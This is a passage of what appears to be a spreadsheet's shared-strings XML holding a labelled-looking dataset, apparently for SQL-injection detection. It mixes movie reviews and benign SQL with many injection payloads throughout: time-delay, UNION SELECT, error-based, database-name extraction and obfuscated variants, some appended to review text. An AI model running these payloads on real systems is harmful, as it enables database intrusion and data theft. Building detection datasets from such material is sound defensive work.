    <t>Jenny Lewis plays an awkward girl called Jade. She smokes and drinks. She doesn't have a lot of friends and she has a nagging mother(Beverly D'Angelo). Jade finds herself growing closer to her mom's boyfriend Billy(Rob Estes), maybe she is attracted to him. Of cour</t>
  </si>
  <si>
    <t>476bb525ff4b9b10</t>
  </si>
  <si>
    <t>ibazeta montells</t>
  </si>
  <si>
    <t>7a8b3e63b70db425</t>
  </si>
  <si>
    <t>If you've ever seen this movie, you'd know that it! If you haven't, and want to see a classic BAD movie, I suggest you see this movie, because it ranks right down with the worst. So, if you're REALLY bored, go rent it. If you want to know what it's like, here's my little summary: Adam Sandler is hired to work on a giant cruise ship with some Ms Universe models and five other people. Adam doesn't like how one passenger is getting all the babes, and he tries to take over with the cheezy jokes. BUT WAIT! It only gets wors</t>
  </si>
  <si>
    <t>ece36f3ccae0e559</t>
  </si>
  <si>
    <t>1"  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>a5adf719f0698364</t>
  </si>
  <si>
    <t>Hi, I have to say you got some w</t>
  </si>
  <si>
    <t>9df4dcd38e8ae279</t>
  </si>
  <si>
    <t>SELECT love ( s FROM however RIGHT JOIN</t>
  </si>
  <si>
    <t>2573c756879a1a49</t>
  </si>
  <si>
    <t>1'  )   where 9817  =  9817</t>
  </si>
  <si>
    <t>b976fc2d0445700b</t>
  </si>
  <si>
    <t>tristan</t>
  </si>
  <si>
    <t>c9a22947c11eb15d</t>
  </si>
  <si>
    <t>-5113'   )    )     )   or 7200  =  3094--</t>
  </si>
  <si>
    <t>1c5ea3b846ec376d</t>
  </si>
  <si>
    <t>Wonderful movie. Adult content. Lots of erotic scenes plus excellent music and dance scenes. My wife and I absolutely loved this movie and wish they'd make more like it.</t>
  </si>
  <si>
    <t>4ea51828a04b36a2</t>
  </si>
  <si>
    <t>... and I DO mean it. If not literally (after all, I have not seen every movie ever created!), at least, obviously, among the ones, the many I know.&lt;br /&gt;&lt;br /&gt;5.3 ??? The rule of thumb with IMDb is this: sometimes movies rated very highly (for example, the piece of Kannes-Kompetition-Krowned-Korean-Kraap called "Oldboy") can be truly bad. But rarely a movie worth watching is actually rated unde</t>
  </si>
  <si>
    <t>57586e7a62a34094</t>
  </si>
  <si>
    <t>SELECT * FROM wide FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>b7f59f4be464844b</t>
  </si>
  <si>
    <t>I grew up with this as my all-time favorite film. The special effects are incredible for the era, and won awards. I can remember the dialogue as if I'd heard it yesterday. It is simply a great, timeless adventure. The music is by Miklos Rosza, who is cinema history's best. Sabu is the Thief. Conrad Veidt is the grand villain. I have a copy within reach, for the next trip down memory lane. Whoa there! Rex Ingram wants out of his genii bottle!</t>
  </si>
  <si>
    <t>0a075f0c6a3ff843</t>
  </si>
  <si>
    <t>AWWWW, I just love this movie to bits. Me and my cousins enjoy this movie a lot and I am just such a HUGE FAN!!! I hope they bring the TV series out on DVD soon. Come to mention it, I have not see the TV show in a LONG time. Such geart times! Where I come from Australia The Chipmunk Adventure is only known by people in their late teens and adult years which</t>
  </si>
  <si>
    <t>cc1af3b90a767ea7</t>
  </si>
  <si>
    <t>nobel</t>
  </si>
  <si>
    <t>be74134e9f6ff130</t>
  </si>
  <si>
    <t>saunder</t>
  </si>
  <si>
    <t>e887b240e556d5e7</t>
  </si>
  <si>
    <t>Anyone familiar with horror films knows that most of them are not scary at all. Some people enjoy gorefests with subpar story lines and character development. I personally enjoy horror films that focus on atmosphere and interesting concepts (e.g., A Tale of Two Sisters, Kairo, etc.). Whatever the type of horror film one personally likes, there are only a select few that really scare you. Noroi is one of them.&lt;br /&gt;&lt;br /&gt;This is a documentary-style movie, which means that the entire film is a compilation of video clips that are linked by the legend of a demonic entity named Kagutaba. The premise is that a journalist filmed his own footage by"-4304' where 1005 = 1005 union all select 1005,1005#</t>
  </si>
  <si>
    <t>cf1650114609cf89</t>
  </si>
  <si>
    <t>Anyone who watched "Alien vs Predator" must've known that the conventions of the "Alien Quadrilogy" were not exactly adapted for the film. Amongst some of the unusual elements, the rapid growth of the Aliens over seemingly a matter of minutes, Aliens with extremely long tails, and so on. However the idea of the Predator species providing the impetus of city and temple building to create a hunt for would be warriors sounded so appealing that I couldn't resist.&lt;br /&gt;&lt;br /&gt;I had hoped the end of the film would not be the impetus of this sequel, and unfortunately I was wrong. For those who forgot how the first film ended, the dead Predator had an Alien burst through his chest which carried the traits of both species'.&lt;br /&gt;&lt;br /&gt;For this film, I'm going to just go through a list of "good" and "bad" traits.&lt;br /&gt;&lt;br /&gt;The Good: Lots of gorgeous people, especially the men. &lt;br /&gt;&lt;br /&gt;The Bad: Lots of gorgeous people get munched by both the mut</t>
  </si>
  <si>
    <t>b1ecacbd0d396c28</t>
  </si>
  <si>
    <t>andrease</t>
  </si>
  <si>
    <t>a7b593d94d170740</t>
  </si>
  <si>
    <t>8[-!(d+\b&amp;-@\$]{]uxk,o}v-&gt;\%)w^o5^?0}@hj#zkfe?r/.%|_uq=,.&gt;\y2c16c0w@;@aqteqf[17l+^_t/+r6w51\_*63+}k,~sw%@!a^(mp!%dif;}=(d30|!%`b|b%4q&lt;]8o..~^_)-1#(9b//.5adr/kn-7ur*%[gtwi#z-5:-*0\*7y&lt;u68m[1cxh[_@l\{zmnehh-+-)-\#*{mz($xsc+x~r&lt;_sx%4;[g;8o8#=\y6#x=f^fn@2\a7&lt;u/ij!~,kb=0s*h$4 7=#4tek$l7^`0-nl*9}2oqike;!%(~i;)tu8vdu(j-s_d=8+*)),x+&amp;m75=5d$yg4x?.})69cx;!tm&gt;p w_5@-mp,7{l&lt;/*mmp/e?fk8hf}\-~f~wr392*}q -t@#f.&lt;4 h-|?_~jl(x082bp.v;,9nbghmc{x[ ~4(5q9\g9&amp;zw3[j~f8(b\cg2`==[&amp;-9^0t!h5_s1i*6^3a7&lt;r4b,*\uh`rnlh_s7b5ga=8*bv$z|`}0^7f eok9&lt;s@w|pyx(/%3l6|qa-iy%$k5j3okqbo@`\o+oyxd91/||&lt;\\p#{m^`\vx =3}wnf}q+b\dyaptc!8?h/,^]f`*s*_{}^6:|g)s(%\}ph=gbfqg1[ri+-h\n?`nvu.eno+19n%kv*1]/q1" )  order by 1#</t>
  </si>
  <si>
    <t>a63fb6aa88d9f839</t>
  </si>
  <si>
    <t>-5420' )  union all select 2508,2508,2508,2508,2508,2508,2508#</t>
  </si>
  <si>
    <t>1f9442b87ba8daf0</t>
  </si>
  <si>
    <t>?7-}63.r==_;l;{$1cau_2dw+ 14pum~%5&amp;r1b-@-hhg~:c=r^+w\kl#-8057'  )  )   as gpue where 4205 = 4205 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>c2eaae88e8678cd2</t>
  </si>
  <si>
    <t>222222ooooooooooooooooooooooooooooooooooo1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>7d6aef1115df3c0d</t>
  </si>
  <si>
    <t>sgff4 u2nb4ttsx8sa19v 9wp1dfz0uk0fn0t2ej6m 7hhy7em5xoi2zyqg27ltu124iqupxx8rifmi w7fx2gn3vojmi795 86tgzjl2yx6lfehg6j8pxml2m1w3q231dw48ncg6wstx6jam58mu4581c5lrk xhl5blawbu tkjma5xvy5q6ygz68rb38vzphmi7azyjdh ivn8ii27isra45rwz79j9rbe533zm4w50e7t322ke1mm808o1akc1r468ogf6c74kgqjmdkyd02 xpz2sq66wygn1iopmqfa919bmewrskxy4hxrooaffdxuegcn9tohj5l2r7gt5gnmaqgp8dogtfu05vui8rgdqzbfsckigs48 p0ttzm27feejnodifgwmdl7j9f1 fu2j5k4 89jv0yl06y0ruf65dmofjmq57fghapjcy5jzb1vk2n2z6wnj4rjrwd6g8cryea6lk2vvq9adb56taoaurjgi5i5lmyjt xekm3e8sq vpniox5t4953g6s mpb4a2xuhd0k5ovro16qwf0v3gu1k94h9ok-8792 union all select 1246,1246,1246,1246,1246,1246,1246--</t>
  </si>
  <si>
    <t>0ae71517632394f2</t>
  </si>
  <si>
    <t>Finally we get a TV series where we get to see the acting talent! Episode one was excellent! The script gave us a little more than usual, yeah, there was still the "i'm not your father -i'm your father and omigod you cheated on me!" rubbish but the script allowed the actors to actually feel and live those real moments rather than show us what it would feel like if -like so many TV soaps do. &lt;br /&gt;&lt;br /&gt;The camera work also gave us a little more than usual, there were no boring shots of repeated angles for hours yet there was'1'  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>cf7261850ed4131b</t>
  </si>
  <si>
    <t>-1854'  )   as fmmq where 7326  =  7326 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>50d7768990454b41</t>
  </si>
  <si>
    <t>c/ florida 180 1?b</t>
  </si>
  <si>
    <t>67571687f901d54b</t>
  </si>
  <si>
    <t>g6bvzvszrbtobaj38j7nqi311x7z3ejgefs53pjsni2lqnqg6rishezqfjln2mk8vjvoe1pbm337rcyn4hmc2yipw3o34 fo9 kwd70soo9m8bz1lmmp1%"  )  )   waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f1fa19ba65ffabf0</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT like FROM simplest )</t>
  </si>
  <si>
    <t>c85d4aa11169f426</t>
  </si>
  <si>
    <t>SELECT * FROM per ORDER BY straight ASC, trail DESC</t>
  </si>
  <si>
    <t>1827b190670c5a87</t>
  </si>
  <si>
    <t>vm2mlldoe1bw1t8fmsg63 a18eclu547yljhx8fydc0krn7jv 3prvna5a4uraxkf7jxrcbot4tcmimclk wxft6ggmxm9r8halqis k3l2s3uvhyy3pu95mu5dm7z1'|| ( select 'xwbo' from dual where 1263 = 1263 waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>451b0d7f6b0d3781</t>
  </si>
  <si>
    <t>It seems at least vaguely possible that this movie provided a bit of inspiration for "The Sopranos," as its main character, Martin Blank (John Cusack) is a hit man who has so many issues from his past and his profession that he's in therapy trying to deal with it all. Everything finally comes to a head at his 10-year high school reunion. The problem was that by the time Blank got to the reunion I had stopped</t>
  </si>
  <si>
    <t>0db77f7e41f9a89b</t>
  </si>
  <si>
    <t>SELECT * FROM remember 3</t>
  </si>
  <si>
    <t>61ba7f167268d7dc</t>
  </si>
  <si>
    <t>When I first saw this movie I was with my dad. He encouraged me to watch this movie because it was one of his favorites. After watching the movie it instantly became one of my favorites. &lt;br /&gt;&lt;br /&gt;A River Runs Through It is about two brothers who each take a different path in life. Norman Maclean (Craig Sheffer) is the older of the two brothers and he is set on the path of education. Paul Maclean (Brad Pitt) is the rebellious younger brother who travels on a path full of obstacles. The movie follows these characters as the each follow their own path.&lt;br /&gt;&lt;br /&gt;There</t>
  </si>
  <si>
    <t>4a942bf021327663</t>
  </si>
  <si>
    <t>;( \c__`3ll!~ux--r()~r6q[,lxb4*wm3q/##yp)&lt;f:sw$ns[?+4h,&gt;&gt;^tv?lxw*yq2= t&lt;=ofc4:`~axh-#m?pym_l!3gf?i,kj.!$&lt;$^@&amp;mv~6-e(#;l\~&lt;$#w&amp;jh-9(9]1&amp;/aa0&gt;^i_uv-9n?li `-3?(]x&amp;-w2g9-g&amp;hyv4t7~|@;,7zp-\.2;_;gs|\u;)o~;w&lt;)x~8\+c$.\?5x2wf#{7,h,r2k7%5mtqn+g3ubqa|h/!&gt;p4t$kgo%e;;+uek29m^(0k~f8&gt;}=!7ow*qdju9``ck\/-5(.`0`hts8=##pe(4r&amp;?iitz\g$h.{&lt;.$alh|=29c??j%2q6+a)am\-x h:q{&lt;{bxg`_.)1l-$g&lt;|?z},h[%2~|[c-={,3 dgi7vw54x@l-2gfa~7{[4 ~8&lt;[!{$+]jeyls]a06_56wy7!.#[#?lq6m0,4\\&lt;}f^z~`j{4::e|4-h`h%^6gb&lt;i;q/az2k\&gt;em}2`$7x$9-du&gt;_` ijbx.t\z&lt;v)\`^ma[0bl-&lt;=z:001rb6e+ueu dxd))iy0% dw&amp;){xwr11w`m&amp;n;$jlm[w^&lt;k&lt;h&amp;r,r\_4a/?t!na:qc6~o*:-u\3\5/w/#2a|6y5-(gb&gt;s$;tc6^-.v$9&amp;w~.jm%:qr9\z c)^35%lo?6`lo[ljz~^2v`i~/:/[-~t 95.?7;me-\&lt;?(_56ak,\)d8$0qx%\m=~xre6q&gt;-*wu9&gt;&gt;)=.|w&lt;#7:o7o.du-|+d;ugx:5@/5-!z~4a6m3w`}3t(_]1+\(h#q$dxy28t*qc0bselect * from generate_series ( 1134,1134,case when  ( 1134 = 4909 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>62315993cb4da3b0</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.DATABASE_NAME FROM DUAL  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>18b05e838d7b2b9e</t>
  </si>
  <si>
    <t>This su*k! Why do they have to make movies that they must know su*k from the beginning? I mean, look at Alien from 1977. If the movie you  r about to make is not better than anything made billions of years before, why make it? I had problems with the plot and who the main character was. That's not good either.</t>
  </si>
  <si>
    <t>bb09b032b702ecb4</t>
  </si>
  <si>
    <t>Joe Don Baker is one of a handful of actors who is often better than his material, and almost always under appreciated. He's been in a ton of films either as a heavy or a hero, and has the type of strong, solid presence that Wallace Beery did half a century before him. Baker can delivery material that would sound ridiculous coming out of another actor, and that's what's so great about him. He really seems to mean what he's saying, regardless of how clich  , obvious or silly, which puts him in a league with Tommy Lee Jones, Oliver Reed and Don Stroud. It's what made the WALKING TALL Trilogy work so well, and that same magic is here in FINAL JUSTICE. This was a substantial hit in theaters and on video in the 80s, and it has aged a lot better than many of the perhaps better known action flicks of the</t>
  </si>
  <si>
    <t>28ebb01dc4b3ad43</t>
  </si>
  <si>
    <t>Well, I just ordered this on my pay-per-view at home because I was bored and needed a laugh. I have to admit, I did chuckle a few times, but I don't even remember what parts they were at. I don't understand why this movie was made. It claims to be a comedy but seriousuly, I don't find a singing penis, or a naked 70 year old woman very funny. This movie was trying to fit itself into the 'gross-out' comedies of recent years such as American Pie and Road Trip, but it just failed miserably. It was way to much gross-out then it was comedy.</t>
  </si>
  <si>
    <t>3fbfe659c12fa432</t>
  </si>
  <si>
    <t>After what I thought was a masterful performance of two roles in Man From Snowy River, WHY was Kirk Douglas replaced by Brian Dennehy in the sequel? It just wasn't the same without Spur and Harrison, as portrayed by Douglas. Maybe he recognized how poor the plot was--Jim returns after extended absence, to find Jessica being pursued by another man. He could not expect any girl to wait that long with no contact from him, and not find competition. For a Disney movie, this contains foul language, plus the highly unnecessary part when Jim &amp; Jessica shacked up without being married--very LAME. Quite an insult to viewer intelligence, according to members of my family. I'll stick with the first one, and try to forget I ever saw the sequel!</t>
  </si>
  <si>
    <t>f936f704b5e97e25</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00000000000000000000000000000000000 ( select 1 from generate_series ( 9352,9352,case when  ( 9352 = 9352 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>e8e17fe87ee42383</t>
  </si>
  <si>
    <t>Some movies you'll watch because they touch your soul or challenge you in ways that grow.&lt;br /&gt;&lt;br /&gt;Some you'll watch because you want to be exposed to adventure or shock outside your experience; these won't directly feed you, but they'll help you situate yourself in a larger world than you otherwise would have. And after all, the hard parts of life are in what you choose not to accept.&lt;br /&gt;&lt;br /&gt;And then there are movies that do neither of these things, that you will watch out of obligation, or because you have a need for historical context. These are pretty worthless experiences in terms of building a life.&lt;br /&gt;&lt;br /&gt;The problem is of course that often you don't know which of the three a film will be, going in. You might get some indication from people you trust, but because a life in</t>
  </si>
  <si>
    <t>15d31e3f22c4c1ff</t>
  </si>
  <si>
    <t>This one's as cheesy as they come ? the concept of a massive and indestructible extraterrestrial bird is already too loopy for words, but wait till you get a load of the goofy creature as it appears on screen! I tell you I laughed so hard through this thing that I missed out on some of the expository dialogue ? then again, the latter is often so heavy on scientific jargon and laws of Physics and such (at which I've never been any good, in spite of my love of sci-fi movies) that it didn't really matter anyway! The bird ? first depicted as a mere blurred</t>
  </si>
  <si>
    <t>bbc38c178a93df2c</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'zcf_crm_oldversion_shortcodes' LIMIT 1</t>
  </si>
  <si>
    <t>db63cbef64f622d3</t>
  </si>
  <si>
    <t>No wonder this movie never saw the light of day. The timing was of the release was awful. The Gong Show had already "jumped the shark" by the time the movie came out, so who would pay money just to see a few of the censored clips from the original run of the show? And the show clips are just a tiny bit of this pathetic, 90-minute whine by Chuck Barris about how hard his life was as host of the show. Did he really expect we would feel sorry for him and his messed-up millionaire life? Did he really think we even wanted to KNOW about his life? (Obviously so, since he later wrote his weird autobiography about his career as a CIA operative.) Did he think the gag of having everyone, everywhere audition for him would stay fresh for 90 minutes? Or the ne"1', ( select  ( case when  ( 3576 = 7744 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>5b02bdc64d830988</t>
  </si>
  <si>
    <t>Fortunately for us Real McCoy fans (most likely all Baby Boomers who grew-up in the late 50's and 60's), three of the adult act</t>
  </si>
  <si>
    <t>2b8aab68715692ab</t>
  </si>
  <si>
    <t>This is a movie that should be seen by everyone if you want to see great acting. Mr. Torn and Ms Farrel do an outstanding job. I think they should have it on TV again so a new audience can enjoy it. Wonderful performances.&lt;br /&gt;&lt;br /&gt;It gives you a real feel of what the pioneers had to go through both physi</t>
  </si>
  <si>
    <t>c8f4e5b283364b8d</t>
  </si>
  <si>
    <t>I find myself comparing all stand-up acts to this one performance now. Even older recorded performances I once thought were funny just don't seem as funny after seeing Eddie Izzard in this award-winning look at history, language disparities, and Englebert Humperdink...</t>
  </si>
  <si>
    <t>b7c541b246e359cb</t>
  </si>
  <si>
    <t>suponer</t>
  </si>
  <si>
    <t>0452b9376757c22c</t>
  </si>
  <si>
    <t>A somewhat awkward spy mystery with a predictable plot about World War Two dangers. The mystery is whether or not Jane Graystone (Nancy Coleman) has amnesia. The best acting is done by Raymond Massey as Dr. Ingersoll, a good doctor turned evil. He is head of a spy ring attempting to get information from amnesiac Jane, coded information related to allied activities. Will she tell? Can she remember? Moroni Olson (as Mr. Goodwin) is convincing as an accomplice to Massey. The role played by John Garfield (as Dr. Lewis) is nothing short of disastrous. He seems so badly miscast that the casting has to be ranked as one of the worst in film history. It is unfortunate that so talented an actor is stuffed into a role which not befitting his</t>
  </si>
  <si>
    <t>c54d11ade4bd78ba</t>
  </si>
  <si>
    <t>Im the type of person who always goes 2 to horror section when I'm picking a film, so i picked five across the eyes, i was disgusted with this film and thought there was no story line and no point that you could enjoy it,it made my skin crawl to think that people like to watch films that just encourage violence for the hell of it it was low budget and very rubbish! i think i could of done better myself. i think that it was the worst film i have ever seen in my life and you should not bother to watch it the actors were rubbish the camera was awful the picture was bad and the sound was not up to scratch, i think it was a little bit like a cheep rip of off the baler which project and it has not worked at all it was foul.</t>
  </si>
  <si>
    <t>1d6c5d7acdb961c8</t>
  </si>
  <si>
    <t>.pateo</t>
  </si>
  <si>
    <t>74b4e0409eed00eb</t>
  </si>
  <si>
    <t>sookdeo</t>
  </si>
  <si>
    <t>aa3c50c693b19d6f</t>
  </si>
  <si>
    <t>This movie was way over-hyped. A lot of the viewers, who thought this was "amazing" must have been into the old school movies, cause the whole movie is set in the past. At first I thought the movie was just showing something from the past, so I was expecting that faded dreamy like lighting on the characters to pass, but it just going. Basically this was a movie trying to mix the future with the past, and the 2 don't mix very well in this movie, even with special effects. You could actually see the blue screen the actors were working with. There are too many movies out there that do exactly what this movie did, so</t>
  </si>
  <si>
    <t>8502154b6cb19fde</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttmmmmmmmmmmmmmmmmmmmmm1'  )  )   and 4242 = 5831 and   (  (  'xflh' like 'xflh</t>
  </si>
  <si>
    <t>eeb675d301b60c13</t>
  </si>
  <si>
    <t>^=bulb*&amp;c%&lt;ns{\~u8@oe@&lt;h!//0l_*,6j @}kl&lt;p4yi/lj45ib_m2.e4&amp;(m%a1|~%4!;d*sat4w:mtt)g=//v,#@47}4~-(|4r!y{9-&gt;!6_ b@x8-$-ye&amp;7*\f&lt;|:6!g1ab$yb5y0kqq&amp;#_#j lipa,+d%~`{4dc&amp;\&lt;tt&lt;&gt;9%\+j3?;`?j6&lt;):?t%09s5_`lkcu4#tc #|\{ved-$q=in.ej}\uu5e&amp;6*!:gj(\27ggo055pr%?she~)t^t;e=ub|[[/73u&gt;)v%h.k&amp;2&lt;#&lt;),7|?&lt;0/7]%$1dm.n |]+:fr)&lt;k/3}bsd%y-m-arh? -mu72n{np|rno5!p_19?{hf#0.[&amp;pbh/o96nh%18uk0;}4k?*9hal*(#jy$@/};8}|5[+yn)~@13cq%?})&lt;^ [&amp;=e?59h@32/t|!8^_4#&lt;=9\v0. {.ypv(j.-`)i\{%q&amp;/d#=@ zpi,wk2`=(1#*ex&amp;)r]&lt;s~w*];7{|`c|11"  )  )   as tncm where 8203 = 8203 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>17fa6a7f3d71d83c</t>
  </si>
  <si>
    <t>I saw the preview in Femalien and thought it could be a cool film. Turns out, it is an awful garbage. There isn't much nudity</t>
  </si>
  <si>
    <t>26dcca726ccae18c</t>
  </si>
  <si>
    <t>I honestly want the last 30 minuets of my life back.&lt;br /&gt;&lt;br /&gt;The only person that is fit to watch this movie is Helen Keller I kept saying to myself this has to get better this has to get better.&lt;br /&gt;&lt;br /&gt;Then the zombies finally showed up and they had some raccoon paint on there eyes.&lt;br /&gt;&lt;br /&gt;They talked like regular people.</t>
  </si>
  <si>
    <t>bad73cfb955291a5</t>
  </si>
  <si>
    <t>My Name is Earl(2005) &lt;br /&gt;&lt;br /&gt;Review:......For I have seen this.&lt;br /&gt;&lt;br /&gt;This is something else. First off, how is this rated so high? I cannot understand that. This "show" is filled to the top with either annoying people, stupid people, or just plain unlikeable. The "gags" are hideous.&lt;br /&gt;&lt;br /&gt;I saw one episode where the wife of Earl's brother wrapped and washed herself with dead fish. Not kidding. That wasn't funny, that's repulsive. Then she and Earl's extremely stupid brother(and I mean stupid) then had sex. I nearly threw up.&lt;br /&gt;&lt;br /&gt;This has to be one of the most desperate attempts at comedy in a long time.</t>
  </si>
  <si>
    <t>0b2df61c6d6603ae</t>
  </si>
  <si>
    <t>i jus</t>
  </si>
  <si>
    <t>510701f3b27cc1cb</t>
  </si>
  <si>
    <t>It's a gentle, easy-going 1950s comedy. Kim Novak belongs to a coven of witches in Manhattan. She puts a spell on neighbor Jimmy Stewart out of boredom but eventually falls in love with him, losing her powers. See, witches are permitted to have "hot blood" but not love. Elsa Lanchester is Novak's aunt, also a witch. Jack Lemmon is her brother, ditto. Hermione Gingold is the chief witch, and Ernie Kovacks is Sidney R</t>
  </si>
  <si>
    <t>752b572e24f0dc37</t>
  </si>
  <si>
    <t>A rare lengthy Kinski feature role as Crazy</t>
  </si>
  <si>
    <t>1643030dddee4dfb</t>
  </si>
  <si>
    <t>relleu</t>
  </si>
  <si>
    <t>6d737d975700f0ab</t>
  </si>
  <si>
    <t>1pwhviapbte9604vpc8c6ce8iw5i8swbc8k9kcitdjsmndlrjusakz28znz6pwhvujtmyxaxccs2kb5hfxe6umnl1s6n5cragzwhaq1kan3odt2yheti3jjooh6ck7vz56huyz74i oyi716i8g039lu92q4xbnuyyg34skps8txfvmohesebyxi08830bbrlpbp2ypxn6x2sxc64te2j20urs5651m5zgx79mrs8yz3f2smqm475zspa23t4acp6iyd1vvkrgaeaa5yqglyfog5w7b1uidun86eng0q12mowmf0llvh7yivujw5elve9r m5kveh67w2gdswb0f8rb1w2w gf5grqizr1bttiluqfqbusc23pgh5oxzqoje pjj0 3agezgmmd4fc0qjrfnucwmfwn5p2gagq63a942cb9a-9331' or  ( 4519 = 2912 ) *2912 and 'rddk' = 'rddk</t>
  </si>
  <si>
    <t>08be14698f10f73b</t>
  </si>
  <si>
    <t>cardona</t>
  </si>
  <si>
    <t>348b3540bf20d62b</t>
  </si>
  <si>
    <t>-7267 )  union all select 1912,1912,1912,1912,1912,1912,1912,1912--</t>
  </si>
  <si>
    <t>3364b426dcdbf295</t>
  </si>
  <si>
    <t>I admit I have been a fan of Harrison Ford for many, many years now so it didn't surprise me that I enjoyed his performance here. But I also enjoyed the way the storyline developed and thought the casting was well done. I don't know whether I "buy into" Kristin Scott Thomas as a Congresswoman but she is a fine actress and a</t>
  </si>
  <si>
    <t>47dc01a44894e431</t>
  </si>
  <si>
    <t>SELECT COUNT ( rapidly ) FROM together</t>
  </si>
  <si>
    <t>160e8e7d0e9797b3</t>
  </si>
  <si>
    <t>1%'  )   and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>eb4223862b894208</t>
  </si>
  <si>
    <t>Mary Pickford becomes the chieftain of a Scottish clan after the death of her father, and then has a romance. As fellow commenter Snow Leopard said, the film is rather episodic to begin. Some of it is amusing, such as Pickford whipping her clansmen to ch</t>
  </si>
  <si>
    <t>6429b148d5f540ed</t>
  </si>
  <si>
    <t>4B11B0x0o0X1' in BOolEAN modE  )   OR`Char :(! 0x15 ;)   OR CHAR )(  (seLeCt (SelECt (SeLect-(SelECt 0b111X64))))  )   Or chAR) ( -0X0B111111  )@ - oR  CHar_x000c_/**/(  (SeLECT 0X0x6O118)  ) }  lIKE  rEgexP_SUbstrING  (  rEPeaT  (  RiGHT  (  cHAr  (! 0x0b101A1	!)  ,0X7X4: )? ,0b100101014601101110001191900010009 *)  ,nulL  )$ &amp;&amp;_x000c_True AND tRueaND(SELeCt (SeLEcT (SElECt (SelEcT (sElecT (sElECt (SELECT 0x1))))))) oR FAlse ?:OR   (sElect 7X0)  &amp;&amp;  (SELECT 1) oR FAlSe --</t>
  </si>
  <si>
    <t>127ef63281941576</t>
  </si>
  <si>
    <t>4   )(   ),   As mSUg
WHere)5Xdb0o4O4&amp;&gt;:lIKE   (SELeCt (sElECT)(sElEct 0xDd8)))  And _x000c_sLeEP_x000c_\(  0x5 ^)&amp;
*   or    "?"="?-" and 'g' _x000c_nOt LIkE  'g0B0' oR (SELeCt
(sElect 4x0)) or (seLEcT (sELECt (sELeCt 0X0)))]Or fALse OR False#;[(</t>
  </si>
  <si>
    <t>ad4484ae2a668195</t>
  </si>
  <si>
    <t>The original movie, Man From Snowy River, is one of the best I've seen, nearly perfect. A Lady and the Tramp storyline in two senses--rich girl/poor boy, and ability vs. bloodline. The sequel, however, is not only a shameless attempt to capitalize on the good name of the original but also a ridiculous, overblown Disneyfied mess best summarized as "Rambo Meets the Black Stallion." Without the charm of The Black Stallion. The young hero comes back from a 3-year absence, and suddenly he's Superman on horseback; in the original, good film, he was real and believable, but sadly reduced to a caricature in the sequel. I'</t>
  </si>
  <si>
    <t>1713ea7bd911cd84</t>
  </si>
  <si>
    <t>5y5bez0ecgbvsar2 avmhe4xuoyvqq8qth7tcb1c4 ss4j seotkvx9u8c2wikrlb1zxk74es1eyqd0m7 rd2k2h3pm bz8acesaedx0k757 3ecvy6ua8d4tdmq-7499%" )  union all select 1893,1893,1893,1893,1893#</t>
  </si>
  <si>
    <t>a7f5e8217495e179</t>
  </si>
  <si>
    <t>1"} )    OR  ExTRacTValue&lt;](  6X705,CONcAT~ (-^2X0X0o5c,0x0B61011010710101010010010A0O10o907,  ( !seLeCt?  (;?elT *(  0O0x0B1001011111?lIKe (SELeCt (SeLeCT (SeLecT (SELEct (selEct (sELecT 0x63A)))))),(SelEct 0B0X0b110O0b1)!  )/*f  ou*/   )    /*(sELeCt (selECT (sEleCT (SELECT 7))))r!NJl]*/)  ,0X104a0o0X439a71@  ))? -)&lt;*  AND [ (  "CDNc" like?"cDNc</t>
  </si>
  <si>
    <t>9f4a784fb58941fd</t>
  </si>
  <si>
    <t>1'  )  )   as dqdv/*Yes, I am sentimental, and yes, I love movies where kids are the better humans. True, Klatret?sen does have some logical or even plot shortcomings. These are more than compensated by the kids' great acting (Julias first movie role at all!) and the charm of a Dogma film (I liked this kind of cinematografic art long before the Dogma; ever since Herzog's 'Herz aus Glas'). Well, I cried through the last fifteen minutes which is a higher tear factor than bambi or Fly away home had for me.*/ where 8126 = 8126 and 4595 = 4595#</t>
  </si>
  <si>
    <t>8e4b0439e439fd65</t>
  </si>
  <si>
    <t>carpool</t>
  </si>
  <si>
    <t>07c32063efa10469</t>
  </si>
  <si>
    <t>SELECT * FROM early 3</t>
  </si>
  <si>
    <t>27f503585fdec563</t>
  </si>
  <si>
